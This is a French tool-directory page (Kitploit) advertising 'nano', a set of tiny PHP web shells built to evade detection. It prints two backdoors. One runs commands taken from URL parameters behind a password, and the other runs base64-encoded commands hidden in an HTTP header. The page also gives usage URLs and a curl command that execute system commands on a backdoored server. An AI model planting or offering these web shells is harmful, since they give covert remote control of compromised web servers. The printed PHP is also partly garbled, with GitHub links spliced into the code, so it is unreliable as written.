Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
nano — Nano est une famille de shells web PHP optimisés par code golf pour la furtivité. | Kitploit
Outils/GitHubGitHub/s0md3v/nano
Génération de PayloadsShellcodeExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHubs0md3v/nano

nano

Nano est une famille de shells web PHP optimisés par code golf pour la furtivité.

Voir le dépôt
44991il y a 6 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

nano

Nano est une famille de webshells PHP codés en code golf pour être extrêmement furtifs et efficaces.
Gardez-le à l'œil peut-être, je continuerai à ajouter d'autres webshells ici.

Nano

root@kitploit:~
<?=$_GET[p]==_&&$_GET[f](https://github.com/s0md3v/nano/blob/HEAD/$GET_%5Bc%5D);

Fonctionnalités

  • 35 octets de taille
  • Indétectable par les analyseurs de code statiques
  • Prend en charge l'authentification

Utilisation

http://example.com/nano.php?f=function&c=command&p=password

f correspond à la fonction
c correspond à la commande
p correspond au mot de passe

Par exemple, le code ci-dessous exécutera la commande ls :

http://example.com/nano.php?f=system&c=ls&p=password

Ninja

root@kitploit:~
<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0](https://github.com/s0md3v/nano/blob/HEAD/$x%5B1%5D);

Fonctionnalités

  • 93 octets de taille
  • Totalement indétectable

Utilisation

Celle-ci est un peu plus complexe.
Disons que vous voulez exécuter system(ls), écrivez donc system~ls puis encodez-le en base64, c'est-à-dire c3lzdGVtKGxzKQ==
Ajoutez maintenant 1 caractère quelconque au début. Disons 'x', cela donnera donc xc3lzdGVtKGxzKQ==
Ouvrez maintenant votre terminal et tapez la commande suivante :
curl -H 'x: xc3lzdGVtKGxzKQ==' http://example.com/backdoored.php
Trop de travail ? Vous pouvez utiliser le handler à la place.

handler

Tout le reste

C'est mon premier truc en PHP, donc s'il existe une meilleure façon de faire ce que j'ai fait, faites-le-moi savoir ou ouvrez une pull request.
Le projet nano est sous licence MIT, ce qui signifie essentiellement que vous devez me créditer si vous voulez le redistribuer ou le modifier.

Télécharger l’outil